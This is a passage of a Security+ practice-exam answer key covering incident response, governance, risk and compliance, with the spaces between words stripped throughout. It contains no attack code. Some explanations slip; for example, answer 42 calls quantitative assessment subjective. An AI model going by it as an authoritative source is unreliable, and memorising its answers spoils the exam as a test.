122. A. Iftheprivatekeyandthepassphraseforacertificateareexposed,thecertificateshouldberevoked.Anewcertificatewillneedtobeissued,butthecertificatecannotbetrustedandrevocationisthefirststeptohandletheissueproperly.Changingthepasswordwillnothelp,andchangingtheprivateorpublickeywillrequireanewcertificate.

123. C. Alegalholdnoticewillinformthecompanythattheymustpreserveandprotectinformationrelatedtothecase.Noneoftheotheritemsaretermsusedinthisprocess.

124. B. netstatcanshowallactiveconnections,andusingthe-aflagwilldoso.netstatdoesnotprovidea-ccommandflag.Theroutecommandisusedtomodifyanddisplaythesystem’sroutingtable.hpingisapacketanalyzerandpacketbuildingtooloftenusedtocraftspecificpacketsaspartofpenetrationtestsandattacks.


125. B. Aquarantinesettingwillplaceamaliciousorsuspectfileinasafelocationandwillkeepitthereuntilasettimeframehaspassedoruntilanadministratortakesactiontodealwithit.Thiscanallowyoutofurtheranalyzethefileortorestoreitifitwasanincorrectidentificationorifthefileisneededforanotherpurpose.Containmentisusedtolimittheextentofanincidentorattack,isolationkeepsasystemordevicefromconnectingtooraccessingothers,anddeletingafilewouldn’tkeepitaround.

126. D. AlthoughLinuxsystemscanuseafileforswapspace,acommonsolutionistouseaseparatepartitionforswapspace.

127. A. Trackingmultipledrivesrequirescarefulinventory,evidencehandlinglogging,andtaggingofthedrivestoensurethattheyaretherightdriveandthattheyaretrackedthroughouttheforensicinvestigation.Marcoshouldcarefullytageachofthedrivesandensurethatthosetagsareusedthroughouttheinvestigation.

128. D. The-vflagfornetcatsetsittoverbosemode.ThatmeansthatIsaachasattemptedtoconnecttoeveryportfrom1to1024on10.11.10.1usingnetcat.Sincetherearenootherflagsoroptions,itwillsimplytrytoconnect,andthenprovideaverboseresultaboutwhathappened,resultinginasimplebuteffectiveportscan.

129. B. Tony’sbestoptionislikelycontainment.Hemaywanttoremovethatlocationfromthecorporatenetworkortopreventmosttrafficfrombeingpermitteduntilhecantakeadeeperlookintowhatisgoingon.Ifheisolatedtheentiresite,hemightdisruptcriticalbusinessoperations,andsegmentationwouldhavebeenmoreappropriatebeforetheeventoccurred.

130. C. Right-to-auditclausesarecommonlyacceptedaspartofserviceandleasingcontractsregardlessoflocationfordatacenterco-locationandfacilityrentalcontracts.Cloudserviceproviders,however,arelesslikelytosignaright-to-auditcontract.Instead,theymayprovidethird-partyauditdatatocustomersoreventopotentialcustomers.

131. D. ThebestoptionforAlainawouldbetouseaURLfiltertoblockusersfromvisitingthelinkinthephishingemail.AWAF,orwebapplicationfirewall,isdesignedtopreventattacksagainstawebapplication.Patchingcanhelpstopexploitsofvulnerableservicesorsystems,butthisisaphishingattack,andanallowlistlistsalloweditems,notblockeditems,andlimitingwhichwebsitesanentirecompanycanvisitisalmostimpossibleinmostcircumstances.


132. A. Playbookslisttheactionsthatanorganizationwilltakeaspartofaresponseprocess.Arunbookliststhestepsrequiredtoperformanactionlikenotification,removingmalware,orsimilartasks.Playbookstendtobeusedtodocumentprocesses,whereasrunbookstendtobeusedforspecificactions.Adisasterrecovery(DR)planisusedtorecoverfromdisasters,andabusinesscontinuity(BC)planisusedtoensurethattheorganizationcontinuestofunction.

133. B. SinceMACaddressesareonlyvisiblewithinabroadcastdomain(localnetwork),theMACaddressesofexternalhostscannotberetrievedusingthearpcommand.TheMACaddressesforlocalsystems,theIPaddressesofthelocalhost,andwhethertheyaredynamicorstaticcanallbedeterminedusingthearpcommand.

134. C. Thejournalctltoolisusedtoquerythesystemdjournal.Onsystemd-enabledLinuxdistributions,thejournalcontainskernelandbootmessagesaswellassyslogmessagesandmessagesfromservices.

135. C. Therecoveryphaseofteninvolvesaddingfirewallrulesandpatchingsystemsinadditiontorebuildingsystems.Althoughpreparationmayinvolveconfiguringfirewallrulesorregularpatching,itdoesnotdosoinresponsetoanincident.Containmentmightinvolvebothbutislesslikelyto,sincethefocuswillbeonbroaderfixes,anderadicationworkstoremovethethreat.

136. A. Thecurlcommand-linetoolsupportsdownloadsanduploadsfromawidevarietyofservices,anditwouldbetheidealsolutionforthisscenario.hpingisusedforcraftingpackets,nmapisaportscanner,andtheHarvesterisanopensourceintelligencegatheringtool,noneofwhichmeetGary’sneeds.

137. C. Garyshouldlookatthetrendinformationformalwaredetectionstochecktoseeiftherearemoreinfectionsbeingdetectedthanduringrecentweeks.Thiscanbeausefulindicatorofachange,eitherduetoanewmalwaretechniqueorpackage,asuccessfulattackthathasresultedinstaffmembersclickingonmaliciouslinksoropeningmaliciousemails,orotherpathsintotheorganization.Garycouldthencheckwithuserswhosesystemsreportedthemalwaretoseewhathadoccurred.Alertsmightshowtheinfectionsbutwouldnotshowthedataovertimeaseasilyastrends.Sensorswillshowindividualplacesdataisgathered,andbandwidthdashboardscanshowusefulinformationaboutwhichsystemsareusing


moreorlessbandwidth,butthetrendsdashboardremainstherightplaceforhimtolookinthissituation.

138. B. Althoughitcanbeeasytofocusonthedigitalpartofdigitalforensics,interviewswithendusersandothersinvolvedinanincidentcanbeakeyelementofaforensicinvestigation.Investigatorsstillneedtogatherinformationandrecordwhattheyfound,butaninterviewcanprovidefirsthandknowledgeandadditionaldetailsthatmaynotbeabletoberecoveredviatechnicalmeanslikeemailordiskforensics.Achainofcustodydoesnotprovideinformationaboutreportsfromendusers.

139. B. TheonlyoptiononthislistthatsupportsAaron’srequirementsisNXLog.SyslogcanreceiveWindowseventsiftheyareconvertedtosyslog,butitisn’tanativefeature.IPFIXisanetworkflowstandard,andjournalctlisusedtoaccessthesystemdjournal.

140. A. Typicalexercisetypesformostorganizationsincludesimulationsthatemulateanactualincidentresponseprocess,walk-throughsthatguidestaffthroughanevent,andtabletopexercisesthataregamedoutwithouttakingactualaction.Drillsareclassifiedasmorefocusedonspecificactionsorfunctions,andtheyarelesscommonbecausetheycanresultininadvertentactionormistakesanddonotcoverthebreadthofanincident.

141. A. Oftheoptionslisted,netstatistheonlytoolthatwillnotperformaportscan.

142. C. ThetopofthediamondshouldbelabeledAdversary,oneofthefourverticesontheDiamondmodel.

143. C. Electronicdiscovery,ore-discovery,isthelegalproceedinginvolvedinlitigation,FoIArequests,andsimilareffortsthatproduceinformationinelectronicform.Emailforensicscouldberequiredtorecoverdatainaninvestigation,butthereisnoindicationinthequestionofanyneedforforensicinvestigation.InquisitionsandprovenancearenotconceptsfortheSecurity+exam.


Chapter5:Governance,Risk,andCompliance1. A. CarolineshouldselectISO27002.ISO27002isaninternational

standardforimplementingandmaintaininginformationsecuritysystems.ISO27017isaninternationalstandardforcloudsecurity;NIST800-12isageneralsecuritystandardanditisaU.S.standard,notaninternationalone;andNIST800-14isastandardforpolicydevelopment,anditisalsoaU.S.standard,notaninternationalone.

2. B. Ifasystemisinfectedwithmalware,themalwarewilloperatewiththeprivilegesofthecurrentuser.Ifyouusenonadministrativeaccounts,withleastprivileges,thenthemalwarewon’tbeabletoaccessadministrativefunctionalitywithoutaprivilegeescalationcapability.

3. D. Leastprivilegeisthemostfundamentalconceptinestablishingaccounts.Eachusershouldhavejustenoughprivilegestodotheirjob.Thisconceptalsoappliestoserviceaccounts.Althougheachoftheotheroptionsissomethingyouwouldconsider,theyarenotascriticalastheprincipleofleastprivilege.

4. C. Changemanagementistheprocessofdocumentingallchangesmadetoacompany’snetworkandcomputers.Avoidingmakingchangesatthesametimemakestrackinganyproblemsthatcanoccurmuchsimpler.Duediligenceistheprocessofinvestigationandverificationoftheaccuracyofaparticularact.Acceptableusepoliciesstatewhatactionsandpracticesareallowedinanorganizationwhileusingtechnology.Duecareistheeffortmadebyareasonablepartytoavoidharmtoanother.Itisthelevelofjudgment,care,determination,andactivityapersonwouldreasonablyexpecttodoundercertainconditions.

5. A. Anacceptableusepolicy(AUP)isadocumentstatingwhatausermayormaynothaveaccesstoonacompany’snetworkortheInternet.Acleandeskpolicyensuresthatallsensitive/confidentialdocumentsareremovedfromanend-userworkstationandlockedupwhenthedocumentsarenotinuse.Mandatoryvacationpolicyisusedbycompaniestodetectfraudbyhavingasecondperson,familiarwiththeduties,helpdiscoveranyillicitactivities.Jobrotationisapolicythatdescribesthepracticeofmovingemployeesbetweendifferenttasks.Jobrotationcanhelpdetectfraudbecauseemployeescannotperformthesameactionsforlongperiodsoftime.


6. C. ThePCI-DSS,orPaymentCardIndustryDataSecurityStandard,isasecuritystandardthatismandatedbycreditcardvendors.ThePaymentCardIndustrySecurityStandardsCouncilisresponsibleforupdatesandchangestothestandard.GDPR,ortheGeneralDataProtectionRegulation,isastandardfordataprivacyandsecurityintheEuropeanUnion(EU).COPPAistheChildren’sOnlinePrivacyProtectionAct,aU.S.federallaw.CISistheCenterforInternetSecurityandisnotalaworaregulation.

7. A. Companieswillusemandatoryvacationpoliciestodetectfraudbyhavingasecondperson,familiarwiththeduties,helpdiscoveranyillicitactivities.Cleandeskpolicyensuresthatallsensitive/confidentialdocumentsareremovedfromanend-userworkstationandlockedupwhenthedocumentsarenotinuse.Anondisclosureagreement(NDA)protectssensitiveandintellectualdatafromgettingintothewronghands.Continuingeducationistheprocessoftrainingadultlearnersinabroadlistofpostsecondarylearningactivitiesandprograms.Companieswillusecontinuingeducationintrainingtheiremployeesonthenewthreatsandalsoreiteratingcurrentpoliciesandtheirimportance.

8. B. Lockingcabinetsanddrawersisthebestsolutionbecausetheyallowindividualstolocktheirdrawersandensurethataccesstoasinglekeydoesnotallowbroadaccesstodocumentslikeadepartmentdoorlockorproximitycardsforthespace.Onboardingistheprocessofaddinganemployeetoacompany’sidentityandaccessmanagementsystemandwouldnothelpwithsecuringdocuments,butitmightteachtheprocessofdoingso.

9. D. Quantitativeriskassessmentistheprocessofassigningnumericalvaluestotheprobabilityaneventwilloccurandwhattheimpactoftheeventwillhave.Changemanagementistheprocessofmanagingconfigurationchangesmadetoanetwork.Vulnerabilityassessmentattemptstoidentify,quantify,andranktheweaknessesinasystem.Qualitativeriskassessmentistheprocessofrankingwhichriskposesthemostdangerusingratingslikelow,medium,andhigh.

10. D. Amemorandumofunderstanding(MOU)isatypeofagreementthatisusuallynotlegallybinding.Thisagreementisintendedtobemutuallybeneficialwithoutinvolvingcourtsormoney.AnSLA(servicelevelagreement)definesthelevelofservicethecustomerexpectsfromtheserviceprovider.Thelevelofservicedefinitionsshouldbespecificandmeasurableineacharea.ABPA(businesspartnershipagreement)isalegal


agreementbetweenpartners.Itestablishestheterms,conditions,andexpectationsoftherelationshipbetweenthepartners.AnISA(interconnectionsecurityagreement)isanagreementthatspecifiesthetechnicalandsecurityrequirementsoftheinterconnectionbetweenorganizations.

11. A. Escalationisnecessaryincaseswherethecurrentbreachgoesbeyondthescopeoftheorganizationorinvestigatorsorisrequiredbylaw.Inthiscase,Sallybelievesacrimehasbeencommittedandhasescalatedthecasetolawenforcement.Otherescalationsmightbetofederalorstatelawenforcement,ortoothermorecapableinternalorexternalinvestigators.Tokenizingdatausesadeidentifiedreplacementdataitem,publicnotificationnotifiesthepopulationorcustomersatlarge,andoutsourcinginvestigationsmaybedoneifspecializedskillsareneeded.

12. A. Thesinglelossexpectancy(SLE)istheproductofthevalue($16,000)andtheexposurefactor(.35),or$5,600.

13. C. Antivirusisanexampleofacorrectivecontrol.Acorrectivecontrolisdesignedtocorrectasituation.AnIDS(intrusiondetectionsystem)isadetectivecontrolbecauseitdetectssecuritybreaches.Anauditlogisadetectivecontrolbecauseitdetectssecuritybreaches.Arouterisapreventivecontrolbecauseitpreventssecuritybreacheswithaccesscontrollists(ACLs).

14. A. Adeterrentcontrolisusedtowarnapotentialattackernottoattack.Lightingaddedtotheperimeterandwarningsignssuchasa“notrespassing”signaredeterrentcontrols.Theotheroptionsareexamplesofdetectivecontrols.Adetectivecontrolisdesignedtouncoveraviolation,althoughsomedetectivecontrolsmayserveasadeterrent—forexample,whenacameraisvisible,theyarenotprimarilydeterrentcontrols.

15. D. Testingandtrainingarepreventiveadministrativecontrols.Administrativecontrolsdictatehowsecuritypoliciesshouldbeexecutedtoaccomplishthecompany’ssecuritygoals.Adetectivetechnicalcontroluncoversaviolationthroughtechnology.Apreventivetechnicalcontrolattemptstostopaviolationthroughtechnology.Detectiveadministrativecontrolsuncoveraviolationthroughpolicies,procedures,andguidelines.

16. A. Riskacceptanceisastrategyofrecognizing,identifying,andacceptingariskthatissufficientlyunlikelyorthathassuchlimitedimpactthatacorrectivecontrolisnotwarranted.Risktransferistheactofmovingthe


risktohostedproviderswhoassumetheresponsibilityforrecoveryandrestorationorbyacquiringinsurancetocoverthecostsemergingfromarisk.Riskavoidanceistheremovalofthevulnerabilitythatcanincreaseaparticularrisksothatitisavoidedaltogether.Riskmitigationiswhenacompanyimplementscontrolstoreducevulnerabilitiesorweaknessesinasystem.Itcanalsoreducetheimpactofathreat.

17. D. Inmostcases,operatingafacilityinastateissufficientreasontoneedtocomplywithstatelaws.Jimshouldcheckwithalawyer,butheshouldplanonneedingtocomplywithIllinois,Indiana,andOhiolaw,aswellasfederallaws.

18. A. Onboardingistheprocessofaddinganemployeetoacompany’sidentityandaccessmanagementsystem.Offboardingistheprocessofremovinganemployeefromthecompany’sidentityandaccessmanagementsystem.Adverseactionisanofficialpersonnelactionthatistakenfordisciplinaryreasons.Jobrotationgivesindividualstheabilitytoseevariouspartsoftheorganizationandhowitoperates.Italsoeliminatestheneedforacompanytorelyononeindividualforsecurityexpertiseshouldtheemployeebecomedisgruntledanddecidetoharmthecompany.Recoveringfromadisgruntledemployee’sattackiseasierwhenmultipleemployeesunderstandthecompany’ssecurityposture.

19. A. Acleandeskpolicyensuresthatsensitiveinformationanddocumentsarenotleftondesksafterhoursandrequiresemployeestoplacethosefilesintoalessexposedorsecurelocation.Backgroundchecks,continuingeducation,andjobrotationdonotprotectconfidentialinformationleftondesksfrombeingexposed.

20. A. Asusersregisterforanaccount,theyenterlettersandnumberstheyaregivenonthewebpagebeforetheycanregister.Thisisanexampleofadeterrentcontrolsinceitpreventsbotsfromregisteringandprovesthisisarealperson.Detectivecontrolsdetectintrusionasithappensanduncoversaviolation.Acompensatingcontrolisusedtosatisfyarequirementforasecuritymeasurethatistoodifficultorimpracticaltoimplementatthecurrenttime.Degaussingisamethodofremovingdatafromamagneticstoragemediabychangingthemagneticfield.

21. D. Aparkingpolicygenerallyoutlinesparkingprovisionsforemployeesandvisitors.Thisincludesthecriteriaandproceduresforallocatingparkingspacesforemployeesandisnotapartoforganizationalsecuritypolicy.


Instead,itisanoperationalorbusinesspolicy.Anacceptableusepolicydescribesthelimitsandguidelinesforuserstomakeuseofanorganization’sphysicalandintellectualresources.Thisincludesallowingorlimitingtheuseofpersonalemailduringworkhours.SocialmediapolicydefineshowemployeesshouldusesocialmedianetworksandapplicationssuchasFacebook,Twitter,LinkedIn,andothers.Itcanadverselyaffectacompany’sreputation.Passwordpoliciesdefinethecomplexityofcreatingpasswords.Itshouldalsodefineweakpasswordsandhowusersshouldprotectpasswordsafety.

22. C. Proprietarydataisaformofconfidentialinformation,andiftheinformationisrevealed,itcanhavesevereeffectsonthecompany’scompetitiveedge.Highisagenericlabelassignedtodatainternallythatrepresentstheamountofriskbeingexposedoutsidethecompany.Thetop-secretlabelisoftenusedingovernmentalsystemswheredataandaccessmaybegrantedordeniedbasedonassignedcategories.Lowisagenericlabelassignedtodatainternallythatrepresentstheamountofriskbeingexposedoutsidethecompany.

23. C. Antivirussoftwareisusedtoprotectcomputersystemsfrommalwareandisnotaphysicalsecuritycontrol.Physicalcontrolsaresecuritymeasuresputinplacetoreducetheriskofharmcomingtoaphysicalproperty.Thisincludesprotectionofpersonnel,hardware,software,networks,anddatafromphysicalactionsandeventsthatcouldcausedamageorloss.

24. A. Quantitativeriskassessmentistheprocessofassigningnumericalvaluestotheprobabilityaneventwilloccurandwhatimpacttheeventwillhave.Qualitativeriskassessmentistheprocessofrankingwhichriskposesthemostdangersuchaslow,medium,andhigh.Abusinessimpactanalysis(BIA)isusedtoevaluatethepossibleeffectabusinesscansuffershouldaninterruptiontocriticalsystemoperationsoccur.Thisinterruptioncouldbeasaresultofanaccident,emergency,ordisaster.Threatassessmentistheprocessofidentifyingandcategorizingdifferentthreatssuchasenvironmentalandperson-made.Italsoattemptstoidentifythepotentialimpactfromthethreats.

25. D. Anondisclosureagreement(NDA)protectssensitiveandintellectualdatafromgettingintothewronghands.AnNDAisalegalcontractbetweenthecompanyandthird-partyvendortonotdiscloseinformationpertheagreement.Encrypteddatathatissentcanstillbedecryptedbythethird-


partyvendoriftheyhavetheappropriatecertificateorthekeybutdoesnotrestrictaccesstothedata.ViolatinganNDAwouldconstituteunauthorizeddatasharing,andaviolationofprivilegeduserrole-basedawarenesstraininghasnothingtodowithsharingproprietaryinformation.

26. A. DetectivecontrolslikeCCTVdetectintrusionasithappensandcanhelpuncoverviolations.Policiesareadministrativecontrols.Firewallsandintrusionpreventionsystem(IPS)devicesaretechnicalcontrols.Technicalcontrolsareappliedthroughtechnologyandmaybealsobedeterrent,preventive,detective,orcompensating.

27. C. Sharingofprofitsandlossesandtheadditionorremovalofapartner,aswellastheresponsibilitiesofeachpartner,aretypicallyincludedinaBPA(businesspartneragreement).ExpectationsbetweenpartiessuchasacompanyandanInternetserviceprovideraretypicallyfoundinaservicelevelagreement(SLA).Expectationsincludethelevelofperformancegivenduringthecontractualservice.AnSLAwillprovideaclearmeansofdeterminingwhetheraspecificfunctionorservicehasbeenprovidedaccordingtotheagreed-onlevelofperformance.SecurityrequirementsassociatedwithinterconnectingITsystemsaretypicallyfoundinaninterconnectionsecurityagreement,orICA.

28. D. Abackupgeneratorisacompensatingcontrol—analternatecontrolthatreplacestheoriginalcontrolwhenitcannotbeusedduetolimitationsoftheenvironment.Afirewallisconsideredapreventivecontrol,asecurityguardisconsideredaphysicalcontrol,andanIDS(intrusiondetectionsystem)isconsideredadetectivecontrol.

29. A. Preventivecontrolsstopanactionfromhappening—inthisscenario,preventinganunauthorizeduserfromgainingaccesstothenetworkwhentheuserstepsaway.Acorrectivecontrolisdesignedtocorrectasituation,adeterrentcontrolisusedtodeterasecuritybreach,andadetectivecontrolisdesignedtouncoveraviolation.

30. C. Jobrotationallowsindividualstoseevariouspartsoftheorganizationandhowitoperates.Italsoeliminatestheneedforacompanytorelyononeindividualforsecurityexpertiseshouldtheemployeebecomedisgruntledanddecidetoharmthecompany.

Recoveringfromadisgruntledemployee’sattackiseasierwhenmultipleemployeesunderstandthecompany’ssecurityposture.Separationofdutiesistheconceptofhavingmorethanonepersonrequiredtocompleteatask,


allowingproblemstobenotedbyothersinvolved.Amandatoryvacationpolicyisusedbycompaniestodetectfraudbyhavingasecondperson,familiarwiththeduties,helpdiscoveranyillicitactivitieswhilethepersonwhonormallyperformsthemisoutoftheoffice.Onboardingistheprocessofaddinganemployeetoacompany’sidentityandaccessmanagementsystemorotherinfrastructure.

31. B. Dataminimizationistheprocessofensuringthatonlydatathatisrequiredforbusinessfunctionsiscollectedandmaintained.Tonyshouldensurethathisorganizationisminimizingthedatacollected.Datamaskingredactsdatabutdoesnotdecreasehowmuchiscollected.Tokenizationreplacessensitivevalueswithauniqueidentifierthatcanbelookedupinalookuptable.Anonymizationremovestheabilitytoidentifyindividualsfromdatabutisquitedifficult.

32. A. Riskavoidanceisastrategytodeflectthreatsinordertoavoidthecostlyanddisruptiveconsequencesofadamagingevent.Italsoattemptstominimizevulnerabilitiesthatcanposeathreat.Ariskregisterisadocumentthattracksanorganization’srisksandinformationabouttheriskslikewhoownsit,ifitisbeingremediated,andsimilardetails.Riskacceptanceisastrategyofrecognizing,identifying,andacceptingariskthatissufficientlyunlikelyorthathassuchlimitedimpactthatacorrectivecontrolisnotwarranted.Riskmitigationiswhenacompanyimplementscontrolstoreducevulnerabilitiesorweaknessesinasystem.Itcanalsoreducetheimpactofathreat.

33. D. Systemsshouldberestoredwithinfourhourswithaminimumlossofoneday’sworthofdata.TheRTO(recoverytimeobjective)istheamountoftimewithinwhichaprocessorservicemustberestoredafteradisastertomeetbusinesscontinuity.Itdefineshowmuchtimeittakestorecoverafternotificationofprocessdisruption.Therecoverypointobjective,orRPO,specifiestheamountoftimethatcanpassbeforetheamountofdatalostmayexceedtheorganization’smaximumtolerancefordataloss.

34. A. Adataretentionpolicydefineshowlonganorganizationwillkeepdata.Removingsensitivedocumentsnotinuseisacleandeskpolicy.Aformalprocessformanagingconfigurationchangesischangemanagement,andamemorandumofunderstandingconsistsoflegaldocumentsthatdescribemutualagreementbetweentwoparties.

35. B. ALE(annuallossexpectancy)istheproductoftheARO(annualrateof


occurrence)andtheSLE(singlelossexpectancy)andismathematicallyexpressedasALE=ARO×SLE.Singlelossexpectancyisthecostofanysingleloss,anditismathematicallyexpressedasSLE=AV(assetvalue)×EF(exposurefactor).

36. B. TheCenterforInternetSecurity(CIS)benchmarksproviderecommendationsforhowtosecureanoperatingsystem,application,orothercoveredtechnology.MichellewillfindWindows10–specificsecurityconfigurationguidelinesandtechniques.

37. A. Preventivecontrolslikedatabackupsareproactiveandareusedtoavoidasecuritybreachoraninterruptionofcriticalservicesbeforetheycanhappen.Securitycameras,smokedetectors,anddooralarmsareexamplesofdetectivecontrol.Detectivecontrolsdetectintrusionasithappensanduncoversaviolation.

38. C. Risktransferistheactofmovingtherisktohostedproviderswhoassumetheresponsibilityforrecoveryandrestorationorbyacquiringinsurancetocoverthecostsemergingfromarisk.Riskacceptanceisastrategyofrecognizing,identifying,andacceptingariskthatissufficientlyunlikelyorthathassuchlimitedimpactthatacorrectivecontrolisnotwarranted.Riskmitigationiswhenacompanyimplementscontrolstoreducevulnerabilitiesorweaknessesinasystem.Itcanalsoreducetheimpactofathreat.Riskavoidanceistheremovalofthevulnerabilitythatcanincreaseaparticularrisksothatitisavoidedaltogether.

39. D. Apreventivecontrolisusedtoavoidasecuritybreachoraninterruptionofcriticalservicesbeforetheycanhappen.Administrativecontrolsaredefinedthroughpolicies,procedures,andguidelines.Acompensatingcontrolisusedtosatisfyarequirementforasecuritymeasurethatistoodifficultorimpracticaltoimplementatthecurrenttime.Adeterrentcontrolisusedtodeterasecuritybreach.

40. C. Meantimebetweenfailures(MTBF)isameasurementtoshowhowreliableahardwarecomponentis.MTTR(meantimetorepair)istheaveragetimeittakesforafaileddeviceorcomponenttoberepairedorreplaced.AnRPO(recoverypointobjective)istheperiodoftimeacompanycantoleratelostdatabeingunrecoverablebetweenbackups.ALE(annuallossexpectancy)istheproductoftheannualrateofoccurrence(ARO)andthesinglelossexpectancy(SLE).

41. C. Asinglepointoffailure(SPOF)isasingleweaknessthatcanbringan


entiresystemdownandpreventitfromworking.CloudcomputingallowsthedeliveryofhostedserviceovertheInternet.Loadbalancingspreadstrafficorotherloadbetweenmultiplesystemsorservers.VirtualizationusesasystemtohostvirtualmachinesthatsharetheunderlyingresourcessuchasRAM,harddrive,andCPU.

42. A. Quantitativeriskanalysisrequirescomplexcalculationsandismoretime-consumingbecauseitrequiresdetailedfinancialdataandcalculations.Quantitativeriskassessmentisoftensubjectiveandrequiresexpertiseonsystemsandinfrastructure,andbothtypesofassessmentcanprovideclearanswersonrisk-basedquestions.

43. D. Acustodianconfiguresdataprotectionbasedonsecuritypolicies.Thelocalcommunitybankisthedataowner,notLeighAnn.LeighAnnisanetworkadministrator,notauser,andpoweruserisnotastandardsecurityroleintheindustry.

44. B. Riskacceptanceisastrategyofrecognizing,identifying,andacceptingariskthatissufficientlyunlikelyorhassuchlimitedimpactthatacorrectivecontrolisnotwarranted.Riskmitigationiswhenacompanyimplementscontrolstoreducevulnerabilitiesorweaknessesinasystem.Itcanalsoreducetheimpactofathreat.Riskavoidanceistheremovalofthevulnerabilitythatcanincreaseaparticularrisksothatitisavoidedaltogether.Risktransferistheactofmovingtherisktootherorganizationslikeinsuranceprovidersorhostingcompanieswhoassumetheresponsibilityforrecoveryandrestorationorbyacquiringinsurancetocoverthecostsemergingfromarisk.

45. A. Dataownersassignlabelssuchastopsecrettodata.Custodiansassignsecuritycontrolstodata.Aprivacyofficerensuresthatcompaniescomplywithprivacylawsandregulations.SystemadministratorsareresponsiblefortheoverallfunctioningofITsystems.

46. C. Employeescanleakacompany’sconfidentialinformation.Exposingacompany’sinformationcouldputthecompany’ssecuritypositionatriskbecauseattackerscanusethisinformationaspartofattacksagainstthecompany.Gainingaccesstoacomputer’sMACaddressisnotrelevanttosocialmedianetworkrisk.Gainingaccesstoacomputer’sIPaddressisnotrelevanttosocialmedianetworkrisk.Employeescaneasilyexpresstheirconcernsaboutacompanyingeneral.Thisisnotrelevanttosocialmedianetworkriskaslongastheemployeedoesn’trevealanyconfidential


information.

47. C. Separationofdutiesistheconceptofhavingmorethanonepersonrequiredtocompleteatask.Abackgroundcheckisaprocessthatisperformedwhenapotentialemployeeisconsideredforhire.Jobrotationallowsindividualstoseevariouspartsoftheorganizationandhowitoperates.Italsoeliminatestheneedforacompanytorelyononeindividualforsecurityexpertiseshouldtheemployeebecomedisgruntledanddecidetoharmthecompany.Recoveringfromadisgruntledemployee’sattackiseasierwhenmultipleemployeesunderstandthecompany’ssecurityposture.Collusionisanagreementbetweentwoormorepartiestodefraudapersonoftheirrightsortoobtainsomethingthatisprohibitedbylaw.

48. B. ALE(annuallossexpectancy)=SLE(singlelossexpectancy)×ARO(annualizedrateofoccurrence).SLEequals$750,000(2,500records×$300),andAROequals5%,so$750,000times5%equals$37,500.

49. C. RPO(recoverypointobjective)specifiestheallowabledataloss.Itistheamountoftimethatcanpassduringaninterruptionbeforethequantityofdatalostduringthatperiodsurpassesbusinesscontinuityplanning’smaximumacceptablethreshold.MTBF(meantimebetweenfailures)istheratingonadeviceorcomponentthatpredictstheexpectedtimebetweenfailures.MTTR(meantimetorepair)istheaveragetimeittakesforafaileddeviceorcomponenttoberepairedorreplaced.ARO(annualrateofoccurrence)istheratioofanestimatedpossibilitythatathreatwilltakeplacewithinaone-yeartimeframe.

50. D. Adataretentionpolicystateshowdatashouldbestoredbasedonvarioustypes,suchasstoragelocation,amountoftimethedatashouldberetained,andthetypeofstoragemediumthatshouldbeused.Acleandeskpolicyensuresthatallsensitive/confidentialdocumentsareremovedfromanend-userworkstationandlockedupwhenthedocumentsarenotinuse.AnAUP,oracceptableusepolicy,describesthelimitsandguidelinesforuserstomakeuseofanorganization’sphysicalandintellectualresources.Thisincludesallowingorlimitingtheuseofpersonalemailduringworkhours.Asecuritypolicydefineshowtosecurephysicalandinformationtechnologyassets.Thisdocumentshouldbecontinuouslyupdatedastechnologyandemployeerequirementschange.

51. C. Onboardingistheprocessofaddinganemployeetocompany’sidentityandaccessmanagementsystem.Offboardingistheprocessofremovingan


employeefromthecompany’sidentityandaccessmanagementsystem.Asystemownerisanindividualwhoisinchargeofmanagingoneormoresystemsandcanincludepatchingandupdatingoperatingsystems.Anexecutiveuserwasmadeupforthisquestion.

52. B. Separationofdutycanbeclassifiedasanoperationalcontrolthatattemptstominimizefraudbyensuringthatanindividualcannotexploitaprocessandconcealtheerrorsorissuesthattheyarecreating.Itisnotaphysicalcontroloratechnicalcontrol,andnothinginthequestionindicatesthatthisiscompensatingforgapsleftbyanothercontrol.

53. D. TheGeneralDataProtectionRegulation(GDPR)doesnotincludearighttoanonymity,althoughorganizationsmustbeabletoprovidesecuritysafeguardsthatmayincludeanonymizationwhereappropriate.

54. D. TheNISTRMF’sprocessis.

1. Prepare

2. Categorizesystem

3. Selectcontrols

4. Implementcontrols

5. Assesscontrols

6. Authorizesystem

7. Monitorcontrols

55. B. Securityprogramadministratorsoftenusedifferenttypesoftrainingtoensurethattraineeswhoreactandresponddifferentlytotrainingaregiventrainingthathelpsthem.Theremaybeothervalidreasons,butthisisthemostcommonreasonfortrainingdiversity.

56. A. Risksthattheorganizationitselfcreatesareinternalrisks.Externalrisksarethosecreatedbyfactorsoutsidetheorganization’scontrol.Qualitativeandquantitativearebothtypesofriskassessment,ratherthancategorizationsofrisk.

57. B. Riskregistersaredocumentsusedbyorganizationstotrackandmanagerisksandincludeinformationincludingtheownerorresponsibleparty,detailsabouttherisk,andotherusefulinformation.StatementonStandardsforAttestationEngagements(SSAEs)areauditreports,PaymentCardIndustryDataSecurityStandard(PCI-DSS)isasecuritystandardusedfor


creditcardoperations,andrisktableisnotacommonindustryterm.

58. C. Themeantimetorepair(MTTR)forasystemordevicesistheaveragetimethatitwilltaketorepairitifitfails.TheMTTRisusedaspartofbusinesscontinuityplanningtodetermineifasystemneedsadditionalredundancyorotheroptionsputinplaceifafailureandrepairwouldexceedthemaximumtolerableoutage.Itiscalculatedbydividingthetotalmaintenancetimebythetotalnumberofrepairs.MTBFisthemeantimebetweenfailures,MTTFthemeantimetofail,andMITMisanon-pathattack,atermthathasbeenincreasinglyreplacedwithon-path.

59. D. Commonresultsofbreacheslikethisincludeidentitytheftusingthepersonalinformationofthecustomers,financiallosstothecompanyduetobreachcostsandlawsuits,andreputationalloss.Sincetheincidentresponseprocessisover,Olivia’scompanyshouldhaveremediatedtheunderlyingissuesthatledtothebreach,hopefullypreventingfurtherdowntimeandthusavailabilityloss.

60. D. Thereisnocivilianclassificationlevelforgovernmentdata.Datamaybeunclassified,orsensitivebutunclassified.TopSecret,Secret,andConfidentialareallcommonlyusedclassifications.

61. B. Thesourcecodeforaproductisnottypicallyusedasalocationforprivacytermsandconditions.Instead,theyareinthecontract,userlicenseorrelatedlegalterms,orinaformalprivacynotice.

62. B. Pseudonymizationcanallowreidentificationofthedatasubjectifadditionaldataisavailable.Properlydoneanonymizationcannotbereversed.Anonymizationtechniqueswillgroupinformationsothatindividualscannotbeidentifiedfromdataanduseothertechniquestopreventadditionalinformation,leadingtode-anonymizationofindividuals.

